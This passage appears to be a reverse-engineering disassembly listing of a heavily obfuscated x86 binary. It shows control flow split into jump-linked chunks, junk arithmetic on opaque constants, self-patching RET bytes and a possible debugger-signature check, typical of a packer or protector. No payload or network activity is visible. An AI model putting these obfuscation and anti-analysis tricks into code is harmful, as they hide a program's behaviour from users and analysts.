loc_43C6E8:				; CODE XREF: sub_44980B+Cj
		jnz	loc_44E6FF
		jmp	loc_44CAE4
; END OF FUNCTION CHUNK	FOR sub_44980B
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_49. PRESS	KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_456F9F

loc_43C6F4:				; CODE XREF: sub_456F9F-C2E3j
		jmp	loc_44575D
; END OF FUNCTION CHUNK	FOR sub_456F9F
; ---------------------------------------------------------------------------
		shr	esi, 19h
		jmp	loc_448FAE
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_430. PRESS KEYPAD	"+" TO EXPAND]
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43B6A5

loc_43C702:				; CODE XREF: sub_43B6A5:loc_44D709j
		and	edi, 0A87EA564h
		jmp	loc_44070A
; END OF FUNCTION CHUNK	FOR sub_43B6A5
; ---------------------------------------------------------------------------

loc_43C70D:				; CODE XREF: hvvrg7ie:0044329Fj
		shr	esi, 0Bh
; START	OF FUNCTION CHUNK FOR sub_456F9F

loc_43C710:				; CODE XREF: sub_456F9F:loc_443287j
		add	ecx, 821235D5h
		xchg	ecx, [esp+0]
		jmp	sub_44CB64
; END OF FUNCTION CHUNK	FOR sub_456F9F
; ---------------------------------------------------------------------------
		push	esi
		push	0C872A9Fh
		pop	esi
		or	esi, 27DEA7F8h
		sub	esi, 7BAEAB12h
		test	esi, 80000000h
		jmp	loc_445690
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_450F97

loc_43C73C:				; CODE XREF: sub_450F97:loc_43D664j
		xchg	ecx, [esp+0]
		call	sub_458706
		cmp	[ebp+var_C], 0
		jz	loc_4434FE
		jmp	loc_443AE8
; END OF FUNCTION CHUNK	FOR sub_450F97
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_447E20

loc_43C753:				; CODE XREF: sub_447E20:loc_457598j
		push	ecx
		mov	esp, ebp
		pop	ebp
		mov	eax, ds:dword_44EE28
		or	eax, eax
		jmp	loc_45A84F
; END OF FUNCTION CHUNK	FOR sub_447E20
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_472. PRESS KEYPAD	"+" TO EXPAND]
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_449CB1

loc_43C765:				; CODE XREF: sub_449CB1-4E38j
		jmp	loc_44C619
; END OF FUNCTION CHUNK	FOR sub_449CB1
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43D964

loc_43C76A:				; CODE XREF: sub_43D964:loc_454659j
		call	sub_44957E

loc_43C76F:				; CODE XREF: sub_448BE8+4063j
		xchg	eax, [esp+4+var_4]
		jmp	loc_452C16
; END OF FUNCTION CHUNK	FOR sub_43D964
; ---------------------------------------------------------------------------
		sbb	eax, edx
		jmp	loc_4585B8
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_442FD1

loc_43C77E:				; CODE XREF: sub_442FD1:loc_44AADBj
		add	eax, 18h
		mov	[ebp-14h], eax
		push	6F868A2Eh
		pop	eax
		or	eax, 0B0FCBCA8h
		jmp	loc_4594E8
; END OF FUNCTION CHUNK	FOR sub_442FD1
; ---------------------------------------------------------------------------

loc_43C795:				; CODE XREF: hvvrg7ie:004577D6j
		jge	loc_43A7C2
		popf
		sub	ebx, eax
; START	OF FUNCTION CHUNK FOR sub_458095

loc_43C79E:				; CODE XREF: sub_458095-8D0j
		push	offset sub_439FEE
		jmp	sub_4593B5
; END OF FUNCTION CHUNK	FOR sub_458095
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_359. PRESS KEYPAD	"+" TO EXPAND]
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_449425

loc_43C7A9:				; CODE XREF: sub_449425-681Aj
		add	esi, ecx
		jp	loc_43972E
		not	esi

loc_43C7B3:				; CODE XREF: sub_449425:loc_44FBC5j
		push	edx
		jmp	loc_4455AF
; END OF FUNCTION CHUNK	FOR sub_449425
; ---------------------------------------------------------------------------

loc_43C7B9:				; CODE XREF: hvvrg7ie:00442D8Cj
		jl	loc_443312
		mov	ebx, 35F80DFBh
		and	ebp, esi
		shr	ebp, 2
		jmp	loc_44BD4A
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4418F0

loc_43C7CE:				; CODE XREF: sub_4418F0+112E5j
		add	ebp, eax
		jmp	loc_446F37
; END OF FUNCTION CHUNK	FOR sub_4418F0
; ---------------------------------------------------------------------------

loc_43C7D5:				; CODE XREF: hvvrg7ie:00451205j
		call	sub_450C5A
		push	esi
		push	99EFE3D9h
		pop	esi
		and	esi, 0A21FEE4Dh
		sub	esi, 8661F38h
		rol	esi, 6
		cmp	esi, 360029BCh
		jmp	loc_443927
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_450FF2

loc_43C7FB:				; CODE XREF: sub_450FF2-337Aj
		jz	loc_44B231

loc_43C801:				; CODE XREF: sub_44B7CB-4B79j
					; sub_450FF2:loc_44E070j ...
		mov	ecx, [ebp-14h]
		and	ecx, 7
		push	offset loc_43BE24
		jmp	nullsub_136
; END OF FUNCTION CHUNK	FOR sub_450FF2

; =============== S U B	R O U T	I N E =======================================



sub_43C811	proc near		; CODE XREF: sub_448DB2-FB15j
					; sub_4465A6-BD98p ...

var_8		= dword	ptr -8
var_4		= dword	ptr -4

; FUNCTION CHUNK AT 0043A12B SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0043A38B SIZE 0000000B BYTES
; FUNCTION CHUNK AT 0043B3B4 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0043CC5A SIZE 0000001E BYTES
; FUNCTION CHUNK AT 0043DAEC SIZE 0000000A BYTES
; FUNCTION CHUNK AT 0043DED4 SIZE 00000007 BYTES
; FUNCTION CHUNK AT 0043EA05 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0043F560 SIZE 00000020 BYTES
; FUNCTION CHUNK AT 004446C9 SIZE 00000006 BYTES
; FUNCTION CHUNK AT 00445B41 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00446D4F SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0044790F SIZE 0000000D BYTES
; FUNCTION CHUNK AT 0044952E SIZE 00000016 BYTES
; FUNCTION CHUNK AT 0044B06B SIZE 0000001D BYTES
; FUNCTION CHUNK AT 0044B6B5 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 0044B8C4 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0044C3D7 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0044C7FC SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0044C866 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 0044DAD5 SIZE 00000023 BYTES
; FUNCTION CHUNK AT 004503D5 SIZE 00000010 BYTES
; FUNCTION CHUNK AT 00452368 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 004529B3 SIZE 0000001C BYTES
; FUNCTION CHUNK AT 00453045 SIZE 00000017 BYTES
; FUNCTION CHUNK AT 0045571C SIZE 0000000B BYTES
; FUNCTION CHUNK AT 004566C2 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 004597AA SIZE 00000019 BYTES

		push	edx
		push	ebp
		pop	edx
		xchg	edx, [esp+4+var_4]
		mov	ebp, esp
		push	edi
		jmp	loc_43B3B4
sub_43C811	endp ; sp-analysis failed

; ---------------------------------------------------------------------------
		xor	ebp, 0BB0367ABh
		shl	ebp, 4
		jmp	loc_43B6B9
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_442FD1

loc_43C82D:				; CODE XREF: sub_442FD1:loc_456923j
		mov	eax, edx
		pop	edx
		retn
; END OF FUNCTION CHUNK	FOR sub_442FD1
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44D240

loc_43C831:				; CODE XREF: sub_44D240+6j
		jmp	loc_44D719
; END OF FUNCTION CHUNK	FOR sub_44D240

; =============== S U B	R O U T	I N E =======================================



sub_43C836	proc near		; CODE XREF: sub_43B624+6p
					; sub_440643:loc_4460F3j ...

; FUNCTION CHUNK AT 0044CBCD SIZE 00000005 BYTES

		push	offset sub_444F80
		jmp	loc_44CBCD
sub_43C836	endp

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_45038B

loc_43C840:				; CODE XREF: sub_45038B:loc_4522D9j
		test	edx, ebp
		jmp	loc_43FE10
; END OF FUNCTION CHUNK	FOR sub_45038B
; ---------------------------------------------------------------------------
		or	eax, eax
; START	OF FUNCTION CHUNK FOR sub_454789

loc_43C849:				; CODE XREF: sub_454789:loc_4408E9j
		jnz	loc_442656
		jmp	loc_44E9DD
; END OF FUNCTION CHUNK	FOR sub_454789
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_45B9BB

loc_43C854:				; CODE XREF: sub_45B9BB-109E9j
		jno	loc_43CEEC
		sub	al, 99h
		push	260D8A92h
		pop	edx
		jmp	loc_44B867
; END OF FUNCTION CHUNK	FOR sub_45B9BB
; ---------------------------------------------------------------------------

loc_43C867:				; CODE XREF: hvvrg7ie:0043B19Aj
		shl	eax, 12h
		cmp	ebx, edi
		jmp	loc_450131
; ---------------------------------------------------------------------------

loc_43C871:				; CODE XREF: hvvrg7ie:loc_43EFC8j
		push	edx
		push	esi
		call	sub_444AA3

loc_43C878:				; CODE XREF: hvvrg7ie:00441CF0j
		jmp	loc_44819C
; ---------------------------------------------------------------------------

loc_43C87D:				; CODE XREF: hvvrg7ie:00448B66j
		rol	eax, 13h
		and	eax, 62A50EB1h
		or	eax, 147751F2h
		add	eax, 8C077FF3h
		jmp	loc_447A2E
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_446EC2

loc_43C897:				; CODE XREF: sub_446EC2+C43Dj
		xor	edi, ebp

loc_43C899:				; CODE XREF: sub_446EC2:loc_4472A9j
		push	72980603h
		pop	eax
		or	eax, 9105D62Eh
		add	eax, 0BC17EC5Fh
		add	eax, ebp
		add	eax, 504A3D6Eh
		mov	eax, [eax]
		jmp	loc_44602F
; END OF FUNCTION CHUNK	FOR sub_446EC2
; ---------------------------------------------------------------------------

loc_43C8BA:				; CODE XREF: hvvrg7ie:0043A8C5j
		jnz	loc_4408D3
		jmp	loc_4595A5
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44CEC8

loc_43C8C5:				; CODE XREF: sub_44CEC8+Dj
		jl	loc_442926

loc_43C8CB:				; CODE XREF: hvvrg7ie:00458BAFj
		jmp	loc_44D450
; END OF FUNCTION CHUNK	FOR sub_44CEC8
; ---------------------------------------------------------------------------

loc_43C8D0:				; CODE XREF: hvvrg7ie:0044E125j
		jmp	loc_4577DB
; ---------------------------------------------------------------------------
		jno	loc_44E76B
		jmp	loc_44AF50

; =============== S U B	R O U T	I N E =======================================



sub_43C8E0	proc near		; CODE XREF: sub_43961E+3p
					; hvvrg7ie:0043B73Ej

; FUNCTION CHUNK AT 004457A6 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 0044AA8B SIZE 0000000C BYTES
; FUNCTION CHUNK AT 0044F49E SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00452023 SIZE 00000008 BYTES
; FUNCTION CHUNK AT 00452E5E SIZE 00000005 BYTES

		xchg	eax, [esp+0]
		pop	eax
		dec	dword ptr [ebp-18h]
		jnz	loc_4548D4
		jmp	loc_44F49E
sub_43C8E0	endp ; sp-analysis failed

; ---------------------------------------------------------------------------

loc_43C8F2:				; DATA XREF: sub_442FD1:loc_43DAF6o
		pushf
		add	eax, 0CF851F19h
		add	eax, 307AE0FFh
		mov	eax, [eax]
		call	sub_457C08

loc_43C906:				; CODE XREF: hvvrg7ie:loc_43A3F5j
		push	ebx
		mov	ebx, ecx
		xchg	ebx, [esp]
		mov	ecx, edx
		xchg	ecx, [esp]
		call	sub_4562DC
		jmp	loc_4461D2
; ---------------------------------------------------------------------------

loc_43C91B:				; CODE XREF: hvvrg7ie:0043905Bj
					; hvvrg7ie:loc_448FEEj
		call	nullsub_7
		retn
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_450434

loc_43C921:				; CODE XREF: sub_450434-7ECj
		jmp	loc_43FC69
; END OF FUNCTION CHUNK	FOR sub_450434
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44DF8A

loc_43C926:				; CODE XREF: sub_44DF8A+Cj
		jmp	loc_444DE2
; END OF FUNCTION CHUNK	FOR sub_44DF8A
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44BEBB

loc_43C92B:				; CODE XREF: sub_44BEBB:loc_446061j
		call	sub_439549
		test	al, al
		jz	loc_4559EC
		jmp	loc_43CE43
; END OF FUNCTION CHUNK	FOR sub_44BEBB
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_349. PRESS KEYPAD	"+" TO EXPAND]
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44440B

loc_43C93E:				; CODE XREF: sub_44440B+DAF8j
		jmp	loc_44BBC6
; END OF FUNCTION CHUNK	FOR sub_44440B
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4527A1

loc_43C943:				; CODE XREF: sub_4527A1-C450j
		jmp	loc_445E57
; END OF FUNCTION CHUNK	FOR sub_4527A1
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4395E7

loc_43C948:				; CODE XREF: sub_4395E7+14j
		jmp	loc_4457C5
; END OF FUNCTION CHUNK	FOR sub_4395E7
; ---------------------------------------------------------------------------

locret_43C94D:				; CODE XREF: hvvrg7ie:004506A5j
		retn
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43F907

loc_43C94E:				; CODE XREF: sub_43F907+1AC5Dj
		jmp	loc_456838
; END OF FUNCTION CHUNK	FOR sub_43F907
; ---------------------------------------------------------------------------

loc_43C953:				; CODE XREF: hvvrg7ie:004566BDj
		jmp	locret_442341
; ---------------------------------------------------------------------------

loc_43C958:				; DATA XREF: sub_43F227+A6ADo
		cmp	dword ptr [eax], 47424454h
		jz	loc_43BCB4
		jmp	loc_4477F5
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_525. PRESS KEYPAD	"+" TO EXPAND]
; ---------------------------------------------------------------------------

loc_43C96A:				; CODE XREF: hvvrg7ie:00444BD5j
		jmp	loc_45091F
; ---------------------------------------------------------------------------
		jmp	loc_451F9F
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43BFE7

loc_43C974:				; CODE XREF: sub_43BFE7:loc_45003Bj
					; hvvrg7ie:00450051j
		call	sub_449D75

loc_43C979:				; CODE XREF: sub_45A98D+5j
		jmp	loc_43FDC8
; END OF FUNCTION CHUNK	FOR sub_43BFE7
; ---------------------------------------------------------------------------

loc_43C97E:				; CODE XREF: hvvrg7ie:0044E86Cj
		jmp	loc_44D5D2
; ---------------------------------------------------------------------------

loc_43C983:				; CODE XREF: hvvrg7ie:004457B5j
		jnz	loc_4499A4

; =============== S U B	R O U T	I N E =======================================



sub_43C989	proc near		; CODE XREF: hvvrg7ie:00448C35p

; FUNCTION CHUNK AT 004401D6 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0045050E SIZE 0000000B BYTES

		xchg	eax, [esp+0]
		pop	eax
		test	eax, eax
		jz	loc_458EC6
		jmp	loc_45050E
sub_43C989	endp ; sp-analysis failed

; ---------------------------------------------------------------------------

loc_43C99A:				; CODE XREF: hvvrg7ie:00459EFDj
		jo	sub_451CF6
		jg	loc_439A66
		jmp	loc_45474B
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4478FE

loc_43C9AB:				; CODE XREF: sub_4478FE:loc_4501E2j
		push	offset loc_4523C5
		jmp	nullsub_422
; END OF FUNCTION CHUNK	FOR sub_4478FE
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44B3F1

loc_43C9B5:				; CODE XREF: sub_44B3F1:loc_44296Fj
		pop	eax
		rol	eax, 18h
		push	offset loc_4590CB
		jmp	nullsub_86
; END OF FUNCTION CHUNK	FOR sub_44B3F1
; ---------------------------------------------------------------------------

loc_43C9C3:				; CODE XREF: hvvrg7ie:0044DD27j
		sub	ebx, 0FF46D027h
		jmp	loc_452705
; ---------------------------------------------------------------------------

loc_43C9CE:				; CODE XREF: hvvrg7ie:0043B167j
		push	ebx
		push	edx
		cmp	edx, eax
		sub	edx, 32FA7CAh
		js	loc_44F391
		cmp	ecx, eax
		push	ecx
		xchg	ecx, [esp]
		jmp	loc_4512C8
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_446FC5

loc_43C9E9:				; CODE XREF: sub_446FC5+A21Aj
		call	sub_444593
; END OF FUNCTION CHUNK	FOR sub_446FC5
; START	OF FUNCTION CHUNK FOR sub_4413A5

loc_43C9EE:				; CODE XREF: sub_4413A5-2C9j
		jmp	loc_44DD80
; END OF FUNCTION CHUNK	FOR sub_4413A5
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43D47E

loc_43C9F3:				; CODE XREF: sub_43D47E+1DBj
		mov	eax, edx
		xchg	eax, [esp-4+arg_0]
		push	esi
		push	67E4BA07h

loc_43C9FE:				; CODE XREF: sub_444315:loc_4509A0j
		pop	esi
		rol	esi, 0Dh
		sub	esi, ds:4000F9h
		jmp	loc_456B6B
; END OF FUNCTION CHUNK	FOR sub_43D47E
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4462F9

loc_43CA0D:				; CODE XREF: sub_4462F9-44Aj
		adc	esi, 62FE3E1Dh
		mov	eax, [ebx]

loc_43CA15:				; CODE XREF: sub_4462F9:loc_459902j
		mov	eax, [ebp-4]
		cmp	byte ptr [eax],	0F1h
		jnz	loc_4585E1
		jmp	loc_447FE0
; END OF FUNCTION CHUNK	FOR sub_4462F9
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43A839

loc_43CA26:				; CODE XREF: sub_43A839:loc_44A828j
		push	edi
		push	offset loc_44AF6C
		jmp	nullsub_153
; END OF FUNCTION CHUNK	FOR sub_43A839
; ---------------------------------------------------------------------------
		mov	al, [ebp-5]
		pop	ebx
		pop	ecx
		pop	ecx
		jmp	loc_446CB4
; ---------------------------------------------------------------------------

loc_43CA3C:				; CODE XREF: hvvrg7ie:loc_456B3Dj
					; hvvrg7ie:00456B50j
		and	ecx, 7FB467FBh
		xor	ecx, 144F330h
		add	ecx, ebp
		add	ecx, 0A58B2FABh

loc_43CA50:				; CODE XREF: hvvrg7ie:loc_45564Ej
		mov	ecx, [ecx]
		jmp	loc_43CC1D
; ---------------------------------------------------------------------------

loc_43CA57:				; CODE XREF: hvvrg7ie:loc_458C19j
		call	sub_450C5A
		mov	ds:dword_41D190, eax
		lea	eax, nullsub_492
		mov	byte ptr [eax],	0C3h
		jmp	nullsub_492

; =============== S U B	R O U T	I N E =======================================



sub_43CA70	proc near		; CODE XREF: sub_44E3B3:loc_44CA06p
					; hvvrg7ie:00457B7Bj

; FUNCTION CHUNK AT 0043B238 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0043DA15 SIZE 00000021 BYTES
; FUNCTION CHUNK AT 0044718A SIZE 00000016 BYTES
; FUNCTION CHUNK AT 00447B44 SIZE 0000000A BYTES
; FUNCTION CHUNK AT 00454B02 SIZE 0000000F BYTES
; FUNCTION CHUNK AT 00456E09 SIZE 0000001E BYTES
; FUNCTION CHUNK AT 00458660 SIZE 0000000F BYTES
; FUNCTION CHUNK AT 0045AE8D SIZE 00000028 BYTES

		xchg	eax, [esp+0]
		pop	eax
		push	33444333h
		pop	eax
		sub	eax, 90DF795h
		jmp	loc_45AE8D
sub_43CA70	endp ; sp-analysis failed

; ---------------------------------------------------------------------------

loc_43CA85:				; CODE XREF: hvvrg7ie:loc_444FD5j
		or	edx, 62C52321h
		add	edx, 815E699Dh
		xchg	edx, [esp]
		jmp	loc_44435E
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_214. PRESS KEYPAD	"+" TO EXPAND]
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_439717

loc_43CA9A:				; CODE XREF: sub_439717:loc_447E51j
		jz	loc_44F75A
		jmp	loc_456C90
; END OF FUNCTION CHUNK	FOR sub_439717

; =============== S U B	R O U T	I N E =======================================



sub_43CAA5	proc near		; CODE XREF: hvvrg7ie:004398F5j
					; hvvrg7ie:00439F37p

; FUNCTION CHUNK AT 004409A3 SIZE 00000005 BYTES

		xchg	edi, [esp+0]
		pop	edi
		mov	byte ptr [eax],	0C3h
		jmp	loc_4409A3
sub_43CAA5	endp ; sp-analysis failed

; ---------------------------------------------------------------------------
		call	sub_45B8B1
; START	OF FUNCTION CHUNK FOR sub_440195

loc_43CAB6:				; CODE XREF: sub_440195+11142j
		jmp	nullsub_549
; END OF FUNCTION CHUNK	FOR sub_440195
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_458374

loc_43CABB:				; CODE XREF: sub_458374-15045j
		add	esi, 22302588h

loc_43CAC1:				; CODE XREF: sub_458374:loc_453D84j
		push	0
		push	offset sub_4415C4
		jmp	loc_43F4CA
; END OF FUNCTION CHUNK	FOR sub_458374
; ---------------------------------------------------------------------------

loc_43CACD:				; CODE XREF: hvvrg7ie:00447689j
		imul	byte ptr [edx]
		cmp	al, 0A4h
		jz	loc_43FB4A
		jmp	loc_44ACCB
; ---------------------------------------------------------------------------

loc_43CADC:				; CODE XREF: hvvrg7ie:loc_455C19j
		mov	ds:dword_45730C, edx
; START	OF FUNCTION CHUNK FOR sub_453BBD

loc_43CAE2:				; CODE XREF: hvvrg7ie:0044C3A0j
					; sub_453BBD+957j
		xchg	eax, edx
		push	ecx
		push	76A42C73h
		pop	ecx
		rol	ecx, 1Dh
		jmp	loc_4395CC
; END OF FUNCTION CHUNK	FOR sub_453BBD
; ---------------------------------------------------------------------------
		push	ebx
		push	8EB8C477h
		pop	ebx
		add	ebx, 54D5BC2Ch
		test	ebx, 2000000h
		jmp	loc_4565F4
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_458095

loc_43CB0A:				; CODE XREF: sub_458095-11EA5j
		jno	loc_44C383
		jns	loc_43C62E
		sbb	esi, 9DB0C692h
		shl	ebp, 7
		jmp	loc_45B294
; END OF FUNCTION CHUNK	FOR sub_458095
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_446D8D

loc_43CB24:				; CODE XREF: sub_446D8D-4285j
		cmp	eax, 9FE29DB5h
		jmp	loc_440DDA
; END OF FUNCTION CHUNK	FOR sub_446D8D
; ---------------------------------------------------------------------------

loc_43CB2F:				; CODE XREF: hvvrg7ie:loc_4497F5j
		jl	loc_4573D4
		jmp	loc_440790
; ---------------------------------------------------------------------------

locret_43CB3A:				; CODE XREF: hvvrg7ie:00458E12j
		retn
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44A91A

loc_43CB3B:				; CODE XREF: sub_44A91A+Bj
		jmp	loc_450667
; END OF FUNCTION CHUNK	FOR sub_44A91A
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_45038B

loc_43CB40:				; CODE XREF: sub_45038B-CA69j
		jmp	nullsub_120
; END OF FUNCTION CHUNK	FOR sub_45038B
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44E3B3

loc_43CB45:				; CODE XREF: sub_44E3B3:loc_446B47j
		test	ebx, ebp
		jmp	loc_440F32
; END OF FUNCTION CHUNK	FOR sub_44E3B3
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43D30A

loc_43CB4C:				; CODE XREF: sub_43D30A:loc_44B53Ej
		push	0CBDB2C65h
		pop	ecx
		rol	ecx, 14h
		or	ecx, 9638BEAh
		cmp	ecx, 83730DCFh
		jmp	loc_4395C1
; END OF FUNCTION CHUNK	FOR sub_43D30A
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_336. PRESS KEYPAD	"+" TO EXPAND]
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44989C

loc_43CB67:				; CODE XREF: sub_44989C+D6C9j
		jmp	loc_43EF8C
; END OF FUNCTION CHUNK	FOR sub_44989C
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_445F72

loc_43CB6C:				; CODE XREF: sub_445F72+16j
		rol	ebx, 13h
		add	ebx, 0EAAE3D2Bh
		test	ebx, 8
		jmp	loc_451593
; END OF FUNCTION CHUNK	FOR sub_445F72
; ---------------------------------------------------------------------------
		jns	loc_43B729
		or	ecx, ebp
; START	OF FUNCTION CHUNK FOR sub_446F26

loc_43CB88:				; CODE XREF: sub_446F26:loc_4506CFj
		mov	eax, [ebp-4]
		push	ecx
		push	0DE06F9D5h
		jmp	loc_44DC7D
; END OF FUNCTION CHUNK	FOR sub_446F26
; ---------------------------------------------------------------------------
		not	edx
		jmp	sub_451442
; ---------------------------------------------------------------------------
		xor	ecx, 207298A3h
		xchg	ecx, ebp
		jmp	sub_445E8E
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44980B

loc_43CBAA:				; CODE XREF: sub_44980B:loc_44CAE4j
		adc	esi, ecx
		jmp	loc_44D31B
; END OF FUNCTION CHUNK	FOR sub_44980B
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43E163

loc_43CBB1:				; CODE XREF: sub_43E163+13715j
		ror	ecx, 19h

loc_43CBB4:				; CODE XREF: sub_43E163+136FEj
		add	ecx, 0D03B4573h
		popf
		xchg	ecx, [esp-4+arg_0]
		jmp	loc_43EDA6
; END OF FUNCTION CHUNK	FOR sub_43E163
; ---------------------------------------------------------------------------

loc_43CBC3:				; CODE XREF: hvvrg7ie:00454A2Ej
		jno	loc_445CFF
		push	0B1FB9C34h
		jmp	loc_4543D9
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_125. PRESS KEYPAD	"+" TO EXPAND]
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44E1C9

loc_43CBD4:				; CODE XREF: sub_44E1C9:loc_447DC1j
		mov	dword ptr [ebp-4], 1
		mov	eax, 0
		or	eax, eax
		jz	loc_4463DD
		jmp	loc_43D746
; END OF FUNCTION CHUNK	FOR sub_44E1C9
; ---------------------------------------------------------------------------

loc_43CBED:				; CODE XREF: hvvrg7ie:0043DDC1j
		not	ebx
		pushf
		jmp	loc_452755
; ---------------------------------------------------------------------------

loc_43CBF5:				; CODE XREF: hvvrg7ie:0045658Ej
		or	ebx, 0D294C791h
		jmp	loc_45A7A9
; ---------------------------------------------------------------------------

loc_43CC00:				; DATA XREF: sub_452EF6+2o
		push	0C2F05712h
		pop	eax
		xor	eax, 6A8CEA6Ch
		add	eax, 4C3339E7h
		xor	eax, 6387F77Bh
		jmp	loc_448408
; ---------------------------------------------------------------------------

loc_43CC1D:				; CODE XREF: hvvrg7ie:0043CA52j
		popf
		push	edi
		pushf
		push	93E215D1h
		pop	edi
		rol	edi, 3
		or	edi, 864D3936h
		jmp	loc_43FB57
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_453405

loc_43CC34:				; CODE XREF: sub_453405-16FA5j
		mov	esp, ebp
		pop	ebp
		mov	eax, ds:dword_439C94
		or	eax, eax
		jnz	loc_44DFE2
		jmp	loc_43D860
; END OF FUNCTION CHUNK	FOR sub_453405
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43A839

loc_43CC4A:				; CODE XREF: sub_43A839+1A157j
					; sub_43A839:loc_455FBAj
		push	edi
		call	sub_44A6D7

loc_43CC50:				; CODE XREF: sub_443F4D+12724j
		jmp	nullsub_8
; END OF FUNCTION CHUNK	FOR sub_43A839
; ---------------------------------------------------------------------------

loc_43CC55:				; CODE XREF: hvvrg7ie:loc_44A543j
		call	sub_4403D4
; START	OF FUNCTION CHUNK FOR sub_43C811

loc_43CC5A:				; CODE XREF: sub_43C811:loc_4503D5j
		mov	eax, 19A5E09Eh
		call	sub_450C5A
		mov	ds:dword_41D138, eax
		lea	eax, nullsub_24
		mov	byte ptr [eax],	0C3h
		jmp	nullsub_24
; END OF FUNCTION CHUNK	FOR sub_43C811

; =============== S U B	R O U T	I N E =======================================



sub_43CC78	proc near		; CODE XREF: sub_40B2BC:loc_40B39Ap
					; sub_43CC78:loc_446B3Cj
					; DATA XREF: ...

; FUNCTION CHUNK AT 00446B3C SIZE 00000006 BYTES
; FUNCTION CHUNK AT 00448AA2 SIZE 00000005 BYTES

		call	sub_446B4C
		jmp	loc_448AA2
sub_43CC78	endp

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_452F78

loc_43CC82:				; CODE XREF: sub_452F78-5E4Aj
		rol	ebp, 0Ah
		xchg	ecx, ebx

loc_43CC87:				; CODE XREF: sub_452F78:loc_43A6FBj
		push	eax
		push	8C03C3C6h
		pop	eax
		jmp	loc_455487
; END OF FUNCTION CHUNK	FOR sub_452F78
; ---------------------------------------------------------------------------

loc_43CC93:				; CODE XREF: hvvrg7ie:loc_442686j
					; hvvrg7ie:00456EFDj
		xor	eax, 0FD4E6B65h
		mov	ds:dword_447E48, eax
; START	OF FUNCTION CHUNK FOR sub_441E23

loc_43CC9F:				; CODE XREF: sub_441E23+2j
					; sub_4495B9+6ADBj
		xor	eax, 0FD4E6B65h
		jns	loc_439757
		jmp	loc_44D5DD
; END OF FUNCTION CHUNK	FOR sub_441E23
; ---------------------------------------------------------------------------
